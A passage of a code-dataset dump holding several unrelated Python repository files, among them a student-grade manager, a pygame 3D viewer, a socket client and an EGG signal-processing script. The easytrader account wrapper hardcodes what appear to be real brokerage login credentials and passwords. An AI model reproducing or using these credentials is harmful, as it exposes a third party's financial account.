window=download_mp3_btn)\n\nscreen.mainloop()\n\n","repo_name":"luthfibg/py_audio_video_downloader","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39508450728","text":"#!/Users/maxiaoyu/Desktop/python/evns /py3/bin/python3\n#encoding:utf-8\n'''\n@File : 6.py\n@Time : 2020/05/14 23:16:13\n@Author : DesignerA \n@Version : 1.0\n@Contact : DesignerA@qq.com\n@WebSite : www.cnblogs.com/DesignerA\n'''\n# Start typing your code from here\n#用面向对象,实现一个学生Python成绩管理系统;\n#学生的信息存储在文件中;学生信息的字段有(班级,学号,姓名, Python成绩)\n#实现对学生信息及成绩的增,删,改,查方法;\n\nclass student:\n def __init__(self,class1='',num=' ',name=' ',score=0):\n self.class1=class1\n self.num=num\n self.name=name\n self.score=score\n def add(self):\n with open('/Users/maxiaoyu/Desktop/python/pythonprojects/homework6/score.txt','a') as f:\n f.write('\\n'+self.class1+' '+self.num+' '+self.name+' '+self.score+'\\n')\n def delete(self,num):\n data=[]\n with open('/Users/maxiaoyu/Desktop/python/pythonprojects/homework6/score.txt')as f:\n for line in f.readlines():\n if(line.split(' ')[1]==num):\n continue\n else:\n data.append(line)\n with open('/Users/maxiaoyu/Desktop/python/pythonprojects/homework6/score.txt','w')as f:\n for i in data:\n f.write(i)\n\n def search(self,num):\n with open('/Users/maxiaoyu/Desktop/python/pythonprojects/homework6/score.txt')as f:\n for line in f.readlines():\n if(line.split(' ')[1]==num):\n print('学生信息为:',line)\n break\n else:\n print('学号不存在')\n print(' ')\n\n\ndef scoresystem():\n while(True):\n print('欢迎来到学生成绩管理系统')\n print('1.添加学生成绩信息')\n print('2.删除学生成绩信息')\n print('3.修改学生信息')\n print('4.查询学生信息')\n choice=int(input('请输入想要进行的操作:'))\n if(choice==1):\n class1=input('请输入学生班级:')\n num=input('请输入学生学号:')\n name=input('请输入学生姓名:')\n score=input('请输入学生分数:')\n stu=student(class1,num,name,score)\n stu.add()\n\n elif(choice==2):\n num=input('请输入想要删除的学生学号:')\n stu=student()\n stu.delete(num)\n\n elif(choice==3):\n num=input('请输入想要修改的学生学号:')\n class1=input('请输入新的学生班级:')\n name=input('请输入新的学生姓名:')\n score=input('请输入新的学生分数:')\n stu=student(class1,num,name,score)\n stu.delete(num)\n stu.add()\n \n elif(choice==4):\n 
num=input('请输入学生学号进行查询:')\n stu=student()\n stu.search(num)\n\nscoresystem()\n ","repo_name":"maxiaoyu0727/python","sub_path":"pythonprojects/homework6/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42355581766","text":"import pygame\nfrom math import cos, sin, acos, pi, sqrt\n\n\nclass ModelViewer:\n\t\"\"\" Displays a 3d model. \n\tUse w/s, d/a, and q/e to rotate about x, y, and z axi respectively.\n\tUse c to switch to a cube, p for a pyramid, and t for a triangular prism \"\"\"\n\tSCREEN_SIZE = (600, 600)\n\tCENTER = (300, 300)\n\tBACKGROUND_COLOR = (0, 0, 0)\n\tTEXT_COLOR = (255, 255, 255)\n\tROTATE_RATE = 0.0075\n\tCUBE_SIZE = 150\n\tTRI_PRISM_SIZE = 150\n\tTRI_PRISM_LENGTH = 150\n\tPYRAMID_SIZE = 150\n\tFONT_SIZE = 12\n\tTEXT_SPACING = 3\n\tTEXT_TOP = 5\n\tTEXT_LEFT = 5\n\tFPS = 120\n\n\tdef __init__(self):\n\t\t\"\"\" Create a new application, displaying a cube by default \"\"\"\n\t\tpygame.init()\n\t\tself.screen = pygame.display.set_mode(self.SCREEN_SIZE)\n\t\tpygame.display.set_caption(\"Model Viewer\")\n\t\tself.font = pygame.font.SysFont(\"Arial\", self.FONT_SIZE)\n\t\tself.clock = pygame.time.Clock()\n\t\tself.current_model = Cube(self.CUBE_SIZE)\n\t\tself.running = True\n\t\tself.loop()\n\n\tdef loop(self):\n\t\t\"\"\" Handle events and draw to screen \"\"\"\n\t\twhile self.running:\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tself.running = False\n\t\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == pygame.K_c:\n\t\t\t\t\t\tself.current_model = Cube(self.CUBE_SIZE)\n\t\t\t\t\telif event.key == pygame.K_p:\n\t\t\t\t\t\tself.current_model = Pyramid(self.PYRAMID_SIZE)\n\t\t\t\t\telif event.key == pygame.K_t:\n\t\t\t\t\t\tself.current_model = TriangularPrism(self.TRI_PRISM_SIZE, self.TRI_PRISM_LENGTH)\n\t\t\tkeys = pygame.key.get_pressed()\n\t\t\tif keys[pygame.K_d]:\n\t\t\t\tself.current_model.rotate_y(-self.ROTATE_RATE)\n\t\t\tif keys[pygame.K_a]:\n\t\t\t\tself.current_model.rotate_y(self.ROTATE_RATE)\n\t\t\tif keys[pygame.K_w]:\n\t\t\t\tself.current_model.rotate_x(self.ROTATE_RATE)\n\t\t\tif keys[pygame.K_s]:\n\t\t\t\tself.current_model.rotate_x(-self.ROTATE_RATE)\n\t\t\tif keys[pygame.K_q]:\n\t\t\t\tself.current_model.rotate_z(self.ROTATE_RATE)\n\t\t\tif keys[pygame.K_e]:\n\t\t\t\tself.current_model.rotate_z(-self.ROTATE_RATE)\n\n\t\t\tself.screen.fill((0, 0, 0))\n\t\t\tself.current_model.draw(self.screen, self.CENTER)\n\t\t\tself.draw_instructions()\n\t\t\tpygame.display.flip()\n\t\t\tself.clock.tick(self.FPS)\n\n\tdef draw_instructions(self):\n\t\t\"\"\" Draw instruction text to screen \"\"\"\n\t\tt1 = self.font.render(\"w/s - rotate about x-axis\", True, self.TEXT_COLOR)\n\t\tt2 = self.font.render(\"d/a - rotate about y-axis\", True, self.TEXT_COLOR)\n\t\tt3 = self.font.render(\"q/e - rotate about z-axis\", True, self.TEXT_COLOR)\n\t\tt4 = self.font.render(\"c - change to cube model\", True, self.TEXT_COLOR)\n\t\tt5 = self.font.render(\"p - change to pyramid model\", True, self.TEXT_COLOR)\n\t\tt6 = self.font.render(\"t - change to triangular prism model\", True, self.TEXT_COLOR)\n\t\tlabels = [t1, t2, t3, t4, t5, t6]\n\t\ty = self.TEXT_TOP\n\t\tfor label in labels:\n\t\t\tself.screen.blit(label, (self.TEXT_LEFT, y))\n\t\t\ty += label.get_height() + self.TEXT_SPACING\n\n\n\nclass Model:\n\t\"\"\" Holds data for a 3d model \"\"\"\n\n\tdef __init__(self, points, mesh, 
colors):\n\t\t\"\"\" Create a model from the given vertices and mesh of the given colors.\n\t\t\tPoints: List of tuples in the format (x, y, z)\n\t\t\tMesh: List of tuples representing triangles in the format (p1, p2, p3)\n\t\t\t\t\twhere each p is the index of a vertex \n\t\t\tColors: List of tuples in the format (r, g, b) for the corresponding triangles of the mesh \"\"\" \n\t\tself.points = points\n\t\tself.mesh = mesh\n\t\tself.colors = colors\n\n\tdef rotate_x(self, theta):\n\t\t\"\"\" Rotate about the x-axis by theta radians \"\"\"\n\t\tfor point in self.points:\n\t\t\tnew = [0.0, 0.0, 0.0]\n\t\t\tnew[0] = point[0]\n\t\t\tnew[1] = point[1] * cos(theta) - point[2] * sin(theta)\n\t\t\tnew[2] = point[1] * sin(theta) + point[2] * cos(theta)\n\t\t\tpoint[:] = new[:]\n\n\tdef rotate_y(self, theta):\n\t\t\"\"\" Rotate about the y-axis by theta radians \"\"\"\n\t\tfor point in self.points:\n\t\t\tnew = [0.0, 0.0, 0.0]\n\t\t\tnew[0] = point[0] * cos(theta) + point[2] * sin(theta)\n\t\t\tnew[1] = point[1]\n\t\t\tnew[2] = -point[0] * sin(theta) + point[2] * cos(theta)\n\t\t\tpoint[:] = new[:]\n\n\tdef rotate_z(self, theta):\n\t\t\"\"\" Rotate about the z-axis by theta radians \"\"\"\n\t\tfor point in self.points:\n\t\t\tnew = [0.0, 0.0, 0.0]\n\t\t\tnew[0] = point[0] * cos(theta) - point[1] * sin(theta)\n\t\t\tnew[1] = point[0] * sin(theta) + point[1] * cos(theta)\n\t\t\tnew[2] = point[2]\n\t\t\tpoint[:] = new[:]\n\n\tdef draw(self, screen, center):\n\t\t\"\"\" Draw model to the screen \"\"\"\n\t\ttris = []\n\t\ti = 0\n\t\tfor tri in self.mesh:\n\t\t\tv1 = [self.points[tri[1]][0] - self.points[tri[0]][0],\n\t\t\t\t\tself.points[tri[1]][1] - self.points[tri[0]][1],\n\t\t\t\t\tself.points[tri[1]][2] - self.points[tri[0]][2]]\n\t\t\tv2 = [self.points[tri[2]][0] - self.points[tri[0]][0],\n\t\t\t\t\tself.points[tri[2]][1] - self.points[tri[0]][1],\n\t\t\t\t\tself.points[tri[2]][2] - self.points[tri[0]][2]]\n\t\t\tcross = [v1[1] * v2[2] - v1[2] * v2[1],\n\t\t\t\t\t -v1[0] * v2[2] + v1[2] * v2[0],\n\t\t\t\t\t v1[0] * v2[1] - v1[1] * v2[0]]\n\t\t\tcamera = [0, 0, 1]\n\t\t\tdot = cross[0] * camera[0] + cross[1] * camera[1] + cross[2] * camera[2]\n\t\t\tcross_length = sqrt(cross[0] ** 2 + cross[1] ** 2 + cross[2] ** 2)\n\t\t\tangle = acos(dot / cross_length)\n\t\t\tif angle > pi / 2:\n\t\t\t\ttris.append(tri + [self.colors[i]])\n\t\t\ti += 1\n\n\n\t\tfor tri in tris:\n\t\t\tp1x = int(self.points[tri[0]][0]) + center[0]\n\t\t\tp1y = -int(self.points[tri[0]][1]) + center[1]\n\t\t\tp2x = int(self.points[tri[1]][0]) + center[0]\n\t\t\tp2y = -int(self.points[tri[1]][1]) + center[1]\n\t\t\tp3x = int(self.points[tri[2]][0]) + center[0]\n\t\t\tp3y = -int(self.points[tri[2]][1]) + center[1]\n\t\t\tpygame.draw.polygon(screen, tri[3], ((p1x, p1y), (p2x, p2y), (p3x, p3y)))\n\nclass Cube(Model):\n\t\"\"\" A cube model \"\"\"\n\t\n\tdef __init__(self, size):\n\t\t\"\"\" Create new cube model where the length of each edge is size \"\"\"\n\t\tpoints = [[-size / 2, -size / 2, -size / 2], [-size / 2, size / 2, -size / 2],\n\t\t\t\t[size / 2, size / 2, -size / 2], [size / 2, -size / 2, -size / 2],\n\t\t\t\t[-size / 2, -size / 2, size / 2], [-size / 2, size / 2, size / 2],\n\t\t\t \t[size / 2, size / 2, size / 2], [size / 2, -size / 2, size / 2]]\n\n\t\tmesh = [[3, 0, 1], [1, 2, 3], [3, 2, 7], [6, 7,2],\n\t\t\t\t[4, 7, 6], [6, 5, 4], [5, 1, 0], [0, 4, 5],\n\t\t\t\t[2, 1, 5], [5, 6, 2], [0, 3, 7], [7, 4, 0]]\n\n\t\tcolors = [(255, 0, 0), (235, 0, 0), (0, 255, 0), (0, 235, 0),\n\t\t\t\t(0, 0, 255), (0, 0, 235), (200, 0, 200), 
(185, 0, 185),\n\t\t\t\t(255, 255, 0), (235, 235, 0), (0, 235, 235), (0, 200, 200)]\n\n\t\tsuper().__init__(points, mesh, colors)\n\n\nclass TriangularPrism(Model):\n\t\"\"\" A triangular prism model \"\"\"\n\t\n\tdef __init__(self, tri_size, length):\n\t\t\"\"\" Create a new model where tri_size is the length of the triangle edges \n\t\t\t\tand length is the depth of the prism \"\"\"\n\t\theight = sqrt(tri_size ** 2 - (tri_size / 2) ** 2)\n\t\tpoints = [[-tri_size / 2, -height / 2, -length / 2],\n\t\t\t\t [0, height / 2, -length / 2],\n\t\t\t\t [tri_size / 2, -height / 2, -length / 2],\n\t\t\t\t [-tri_size / 2, -height / 2, length / 2],\n\t\t \t\t [0, height / 2, length / 2],\n\t\t \t\t [tri_size / 2, -height / 2, length / 2]]\n\t\tmesh = [[0, 1, 2], [3, 1, 0], [3, 4, 1], [2, 1, 4], [4, 5, 2],\n\t\t\t\t[0, 2, 5], [5, 3, 0], [5, 4, 3]]\n\t\tcolors = [(255, 255, 0), (255, 0, 0), (235, 0, 0), (0, 255, 0),\n\t\t\t\t (0, 235, 0), (0, 0, 255), (0, 0, 235), (200, 0, 200)]\n\n\t\tsuper().__init__(points, mesh, colors)\n\n\nclass Pyramid(Model):\n\t\"\"\" A pyramid model \"\"\"\n\t\n\tdef __init__(self, size):\n\t\t\"\"\" Create a new model where size is the length of each edge \"\"\"\n\t\theight = sqrt(size ** 2 - (size / 2) ** 2)\n\t\tpoints = [[-size / 2, -height / 2, -size / 2],\n\t\t\t\t [-size / 2, -height / 2, size / 2],\n\t\t\t\t [size / 2, -height / 2, size / 2],\n\t\t\t\t [size / 2, -height / 2, -size / 2],\n\t\t\t\t [0, height / 2, 0]]\n\t\tmesh = [[0, 4, 3], [1, 4, 0], [2, 4, 1], [3, 4, 2], [1, 0, 3], [3, 2, 1]]\n\t\tcolors = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (255, 255, 0), (200, 0, 200), (185, 0, 185)]\n\n\t\tsuper().__init__(points, mesh, colors)\n\n\nif __name__ == \"__main__\":\n\tModelViewer()\n","repo_name":"JoeZlonicky/3DModelViewer","sub_path":"model_viewer.py","file_name":"model_viewer.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"31982906731","text":"\n# coding: utf-8\n\n# In[4]:\n\n\nimport data\n\n\n# In[9]:\n\n\ndef character_frequency(lyrics, vocab_size=3000):\n \"\"\"Analyze Characters frequence.\n \n In a list of list of sentences.\n Example: [[\"song1\", \"hello world\", \"end\"], [\"song2\", \"happy end\"]]\n \"\"\"\n import matplotlib.pyplot as plt\n import numpy as np\n import itertools\n from collections import Counter\n\n get_ipython().magic('matplotlib inline')\n iter_characters = itertools.chain(*itertools.chain(*lyrics))\n frequency_list = Counter(iter_characters).most_common()\n word, freq = zip(*frequency_list)\n \n plt.ylabel('frequency(log)')\n plt.xlabel('rank')\n plt.plot(range(len(frequency_list)), np.log(freq))\n plt.show()\n print('100 Most frequent word: {0}'.format(word[:100]))\n return word[:vocab_size], freq[:vocab_size]\n\n\n# In[10]:\n\n\nif __name__ == '__main__':\n lyrics = data.lyrics_without_timing()\n character_frequency(lyrics)\n\n","repo_name":"qibinc/Lyrics","sub_path":"archived/preprocess/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"26025369252","text":"import sys\r\nsys.path.append(r'D:/MyProjects/python/stockcrawl/下载数据/SellBuy')\r\nimport os\r\nsys.path.append(os.getcwd())\r\nimport easytrader\r\nimport threading\r\nfrom PriceLoop import 
logger\r\n\r\n\r\n\r\n\r\n\r\niniPosiData=[{'证券代码':'','证券名称':'','股票余额':0,'可用余额':0,'冻结数量':0,'成本价':0,'保本价':0,'市价':0,'盈亏比':0,'盈亏':0,'市值':0,'交易市场':'','股东帐户':'','在途数量':0}]\r\n\r\n\r\nclass Account_easytrader():\r\n\t_Account_easytrader_lock = threading.Lock()\r\n\tdef __new__(cls, *args, **kwargs):#实现单例\r\n\t\tif not hasattr(Account_easytrader, \"_instance\"):\r\n\t\t\twith Account_easytrader._Account_easytrader_lock:\r\n\t\t\t\tif not hasattr(Account_easytrader, \"_instance\"):\r\n\t\t\t\t\tcls.InitFlag = False\r\n\t\t\t\t\tAccount_easytrader._instance = threading.Thread.__new__(cls) \r\n\t\treturn Account_easytrader._instance\r\n\tdef __init__(self):\r\n\t\tif not self.InitFlag:\r\n\t\t\tself.InitFlag = True\r\n\t\t\tself.userMutex = threading.Lock()\r\n\t\t\tself.userAccount = 0\r\n\t\t\tself.__UserInition()\r\n\t\t\tself.PosiData = iniPosiData\r\n\t\t\tself.TodayTrades = 0\r\n\t\t\tself.balanceData = 0\r\n\tdef __UserInition(self):\r\n\t\tif self.userMutex.acquire(1):\r\n\t\t\tif (self.userAccount == 0):\r\n\t\t\t\tprint('初始化并登录账号.账号类型:华泰客户端')\r\n\t\t\t\ttry:\r\n\t\t\t\t\tself.userAccount = easytrader.use('ht_client')#华泰客户端\r\n\t\t\t\t\tself.userAccount.prepare(user='666600641060', password='457204', comm_password='241155',exe_path='D:/Program Files/htzqzyb2/xiadan.exe')\r\n\t\t\t\t\tprint('账号登录完成.可进入监控程序。')\r\n\t\t\t\tfinally:\r\n\t\t\t\t\tself.userMutex.release()\r\n\t\t\telse:\r\n\t\t\t\tprint('账号已经初始化。可进入监控程序。')\r\n\t\t\t\tself.userMutex.release()\r\n\tdef GetBalanceData(self):#资金情况\r\n\t\tif self.userMutex.acquire(3):\r\n\t\t\tself.balanceData = self.userAccount.balance\r\n\t\t\tself.userMutex.release()\r\n\tdef GetPosiData(self):#持仓情况\r\n\t\tif self.userMutex.acquire(3):\r\n\t\t\ttry:\r\n\t\t\t\tself.PosiData = self.userAccount.position\r\n\t\t\texcept:\r\n\t\t\t\tself.userMutex.release()\r\n\t\t\telse:\r\n\t\t\t\tself.userMutex.release()\r\n\tdef GetTodayTrades(self):#今日委托\r\n\t\tif self.userMutex.acquire(3):\r\n\t\t\tself.TodayTrades = self.userAccount.today_trades\r\n\t\t\tself.userMutex.release()\r\n\tdef GetAvailable(self):\r\n\t\treturn self.balanceData['可用金额']\r\n\tdef GetTotalAssets(self):\r\n\t\treturn self.balanceData['总资产']\r\n\tdef GetCapitalBalance(self):\r\n\t\treturn self.balanceData['资金余额']\r\n\tdef GettMarketValue(self):\r\n\t\treturn self.balanceData['股票市值']\r\n\tdef GettFreezingFunds(self):\r\n\t\treturn self.balanceData['冻结资金']\r\n\tdef GetHoldingProportion(self):#持仓比例\r\n\t\treturn self.balanceData['股票市值'] / self.balanceData['总资产']\r\n\tdef GetOTWProportion(self):#买入冻结比例\r\n\t\tBuyingFreeze = 0\r\n\t\tfor oneStock in self.PosiData:\r\n\t\t\tBuyingFreeze = oneStock['在途数量'] * oneStock['市价'] + BuyingFreeze\r\n\t\treturn BuyingFreeze / self.balanceData['总资产']\r\n\tdef GetFreezeProportion(self):#卖出冻结比例\r\n\t\tSellFreeze = 0\r\n\t\tfor oneStock in self.PosiData:\r\n\t\t\tSellFreeze = oneStock['冻结数量'] * oneStock['市价'] + SellFreeze\r\n\t\treturn SellFreeze / self.balanceData['总资产']\r\n\r\n\r\n\r\n","repo_name":"136397089/PyProject","sub_path":"stockcrawl/下载数据/SellBuy/Account_easytrader.py","file_name":"Account_easytrader.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40389608794","text":"# -*- coding: utf-8 -*-\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ns.connect(('104.143.38.56', 8124))\n# s.connect(('127.0.0.1', 9999))\n\nprint(s.recv(1024).decode('utf-8'))\ndata = raw_input()\nwhile data != 'exit':\n s.send(data)\n 
print(s.recv(1024).decode('utf-8'))\n data = raw_input()\ns.send(b'exit')\ns.close()\n","repo_name":"s09g/NYIT-Senior-Project","sub_path":"server/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29861438291","text":"from turtle import Turtle\nimport random\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager(Turtle):\n\n def __init__(self):\n super().__init__()\n # self.cars = []\n self.move_distance = STARTING_MOVE_DISTANCE\n self.create_a_car()\n\n\n def create_a_car(self):\n self.shape(\"square\")\n self.color(random.choice(COLORS))\n self.shapesize(stretch_wid=1, stretch_len=2)\n self.penup()\n init_x = random.randint(100, 300)\n init_y = random.randint(-240, 240)\n self.goto(init_x, init_y)\n\n def car_move(self, win_times):\n new_x = self.xcor() - STARTING_MOVE_DISTANCE - win_times * MOVE_INCREMENT * 0.2\n self.goto(new_x, self.ycor())\n\n\n","repo_name":"TruthS1109/turtle-crossing","sub_path":"car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"35025568482","text":"'''author: Shu YuTou Date:2021/5/8'''\nfrom appium import webdriver\n#打开酷狗音乐\n# webdriver.Remote('appium服务器地址',手机配置相关信息)\n'''配置手机相关信息'''\ncaseInfo={\n\t\"platformName\":\"Android\", #测试平台 Android、ios 大小写都可以\n\t\"platformVersion\":\"7.1.2\", #平台版本:设置 关于平板电脑 Android版本\n\t\"deviceName\":\"1\", #设备名称 随便填写,但不能为空\n\t\"appPackage\":\"com.kugou.android\", #包名,即需要测试的软件名称\n\t\"appActivity\":\".app.splash.SplashActivity\",#应用名,界面名 先启动APP,再在cmd中输入‘adb shell dumpsys window | findstr mCurrentFocus’命令获取\n\t\"noReset\":True\n}\n\ndriver = webdriver.Remote('http://localhost:4723/wd/hub',caseInfo)\n","repo_name":"yushuyang2209/AppAutoTest","sub_path":"demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70473857102","text":"import sys\nimport os\nimport redis\nimport re\nimport time\nimport util2 as util\n\n\ndef urlData():\n r = redis.StrictRedis(host=util.localenv(\"REDIS_STATUS_TEST_HOST\"), port=int(util.localenv(\"REDIS_STATUS_TEST_PORT\")))\n day = time.strftime(\"%Y%m%d\")\n yday = time.strftime(\"%Y%m%d\", time.localtime(time.time() - 86400))\n hivedir = os.path.join(util.localenv(\"DATA_DIR\"), \"hive/card_weibo_url_hits_%s\" % day)\n hivefile = os.path.join(hivedir, os.listdir(hivedir)[0])\n regex_url = re.compile('([^\\s]+)\\s+(\\d+)\\s+(\\d+)')\n fp = open(hivefile, \"r\")\n data = {}\n while True:\n line = fp.readline()\n if not line:\n break\n url, second, count = re.match(regex_url, line).groups()\n key = \"%s_card.weibo.com_%s\" % (yday, url)\n if not data.has_key(key):\n data[key] = []\n data[key].append([second, count])\n\n for k, v in data.iteritems():\n r.set(k, v)\n\n fp.close()\n\n\nif __name__ == \"__main__\":\n urlData()\n","repo_name":"bagel/cluster","sub_path":"app/status/urldata.py","file_name":"urldata.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"35265702095","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.signal as signal\nimport sys\nimport codecs\nfrom pylab import *\nfrom 
spectrum import *\n#import corren #only used for Correntropy Processing (experimental)\n\n#===================================================================\n\ndef findmax(xaxix,vmax):\n\tn = len(xaxix)\n\tfor search in range(0,n):\n\t\tif (xaxix[search] >= vmax):\n\t\t\tfound = search\n\t\t\treturn found\n\n\ndef AR_Spectrum(dataAR,norder,fsamp):\n\tAR,P,k = aryule(dataAR,norder)\n\tPSD = arma2psd(AR,NFFT=len(dataAR))\n\tPSD = PSD[len(PSD):len(PSD)//2:-1]\n\tf = fsamp*(linspace(0,1,len(PSD)))\n\tPSDout = abs(PSD)*2./(2.*pi)\n\treturn f,PSDout\n\ndef singleread(dataread,detype):\n\tif (detype==1):\n\t\tdata = np.genfromtxt(dataread,delimiter=\"\\t\")\n\telif (detype==2):\n\t\tdata = np.genfromtxt(dataread,delimiter=\" \")\n\telse:\n\t\tdata = np.genfromtxt(dataread,delimiter=\",\")\n\tn = len(data)\n\tt = np.linspace(0,(1/fsamp)*len(data),len(data))\n\tprint(\"Data Found, Please wait...\")\n\tprint(\"Length Data = %d Samples/data\" %n)\n\n\treturn data,t\n\ndef tgamread(dataread,eegdata):\n\ttry:\n\t\tdata = codecs.open(dataread,\"r\",\"utf-8\",errors=\"ignore\")\n\t\tprint(\"Data Found, Please wait...\")\n\t\tch1=[]\n\t\tch2=[]\n\t\tidx = 0\n\t\tdelta = []\n\t\ttheta = []\n\t\talpha = []\n\t\tbeta = []\n\t\tgamma = []\n\n\t\tfor line in data:\n\t\t\tread = line.split(\",\")\n\t\t\t#print(read)\n\t\t\tTP = 0\n\t\t\tif (read[0]==\"\\r\\n\") or (len(read)==1) or (read[0]==\" \"):\n\t\t\t\ttemp = read\n\t\t\telif (len(read)>2):\n\t\t\t\tfor j in range(3,11):\n\t\t\t\t\tTP += int(read[j-1])\n\t\t\t\tTP_add = read[10].splitlines()\n\t\t\t\tTP += int(TP_add[0])\n\t\t\t\tdelta.append(int(read[3])/(TP*1.0))\n\t\t\t\ttheta.append(int(read[4])/(TP*1.0))\n\t\t\t\talpha.append(int(read[5])/(TP*1.0)+int(read[6])/(TP*1.0))\n\t\t\t\tbeta.append(int(read[7])/(TP*1.0)+int(read[8])/(TP*1.0))\n\t\t\t\tgamma.append(int(read[9])/(TP*1.0)+int(TP_add[0])/(TP*1.0))\n\t\t\t\t#print(TP)\n\t\t\telse:\n\t\t\t\tbaca = read[1].splitlines()\n\t\t\t\t#print(baca)\n\t\t\t\tch1.append(int(read[0]))\n\t\t\t\tch2.append(int(baca[0]))\n\t\t\t\t#print(int(read[0]),int(baca[0]))\n\t\t\t#print(idx)\n\t\t\tidx += 1\n\t\tprint(\"Data Length : \" + str(idx) + \" Samples/data\")\n\t\tdata.close()\n\n\t\t# ch1 Rectified (EMG) ch2 (Raw/ECG/EGG)\n\t\tch1 = np.asarray(ch1)\n\t\tch2 = np.asarray(ch2)\n\t\tt1 = np.linspace(0,(1/500)*len(ch1),len(ch1))\n\t\tt2 = np.linspace(0,(1/500)*len(ch2),len(ch2))\n\n\t\tttt = signal.firwin(200,20,width=None,window=\"hamming\",pass_zero=\"lowpass\",fs=500)\n\t\tchraw = signal.filtfilt(ttt,1,ch2)\n\n\t\t# EEG data\n\t\tdelta = np.asarray(delta)\n\t\ttheta = np.asarray(theta)\n\t\talpha = np.asarray(alpha)\n\t\tbeta = np.asarray(beta)\n\t\tgamma = np.asarray(gamma)\n\n\t\tif (eegdata == 1):\n\t\t\tprint(\"++ EEG data extracted\")\n\t\t\treturn ch1,ch2,delta,theta,alpha,beta,gamma\n\t\telse:\n\t\t\treturn ch1,chraw,t1\n\texcept IOError:\n\t\tprint(\"SORRY, file does not exist. Please re-check.\")\n\ndef preprocessing(datainp,fsamp,fdown):\n\tf1 = 0.015\n\tf2 = 0.15\n\tnumtap = 50\n\n\t#detrend\n\tdatainp = signal.detrend(datainp)\n\n\t#h = signal.firwin(numtap,[f1,f2],width=None, window=\"hamming\",pass_zero=\"bandpass\",scale=False,fs=fsamp)\n\tb,a = signal.butter(6,f2,btype=\"lowpass\",analog=False,output=\"ba\",fs=fsamp)\n\tw,h = signal.freqz(b,a,fs=fsamp)\n\tplt.figure(5)\n\tplt.plot(w,abs(h))\n\t#ch_clean = signal.filtfilt(h,1,datainp)\n\tch_clean = signal.filtfilt(b,a,datainp)\n\tt_clean = np.linspace(0,(1/fsamp)*len(ch_clean),len(ch_clean))\n\n\t#ch_decimate = 
signal.decimate(ch_clean,round(fsamp/fdown),n=None,ftype=\"fir\",zero_phase=False)\n\tch_decimate = downsampling(ch_clean,fsamp,fdown)\n\t\n\treturn ch_decimate,ch_clean\n\t\ndef preprocessing2(datainp,fsamp,fdown):\n\tf1 = 0.015\n\tf2 = 0.15\n\n\t#detrend data (must and compulsory)\n\tdatainpp = signal.detrend(datainp)\n\t\n\tch_decimate = downsampling(datainpp,fsamp,fdown)\n\n\tb,a = signal.butter(6,[f1,f2],btype=\"bandpass\",analog=False,output=\"ba\",fs=fdown)\n\tw,h = signal.freqz(b,a,fs=fdown)\n\tplt.figure(5)\n\tplt.plot(w,abs(h))\n\tch_clean = signal.filtfilt(b,a,ch_decimate)\n\tt_clean = np.linspace(0,(1/fsamp)*len(ch_clean),len(ch_clean))\n\n\t#ch_decimate = signal.decimate(ch_clean,round(fsamp/fdown),n=None,ftype=\"fir\",zero_phase=False) # based on package tool, using downsampling for scratch\n\t\n\treturn ch_clean,ch_decimate\n\ndef downsampling(origin,forigin,flast):\n\tfactor = round(forigin/flast)\n\tndata = len(origin)\n\tcek = 0\n\tdowndata = []\n\twhile (cek < ndata):\n\t\tdowndata.append(origin[cek])\n\t\tcek += factor\n\treturn downdata\n\ndef freqanalysis(chaninp,fsamp):\n\tyfft = np.fft.fft(chaninp,n=len(chaninp))\n\tyabs = abs(yfft)\n\tf = np.linspace(0,fsamp,round(len(yabs)/2))\n\thalf_F = round(len(chaninp)/2)\n\n\treturn f[0:half_F],yabs[0:half_F]\n\nif __name__ == \"__main__\":\n\tfsamp = 200\n\tfdown = 2\n\ttsegmen = 20 # minute\n\t\n\t#for extracting the EEG data from INSINAS device\n\t#ch1,ch2,t = tgamread(sys.argv[1],eegdata=0)\n\t\n\tchread,t = singleread(sys.argv[1],0)\n\t\n\tch2 = chread[:,1]\n\t\n\t#nsegmen = fsamp*tsegmen*60\n\tnsegmen = len(ch2)\n\t\n\tnepoch = round(len(ch2)/nsegmen)\n\tprint(\"Data segment found : %d\" %(nepoch))\n\tcolorchange = 0\n\t\n\tfor seg in range(0,nepoch):\n\t\tstart_seg = seg*nsegmen\n\t\tstop_seg = (seg+1)*nsegmen\n\n\t\t#print(len(ch2[start_seg:stop_seg]))\n\t\t#ch2 = corren.mean_correntropy(ch2[start_seg:stop_seg])\n\n\t\tch_fix,ch = preprocessing2(ch2[start_seg:stop_seg],fsamp,fdown)\n\t\tf,y = 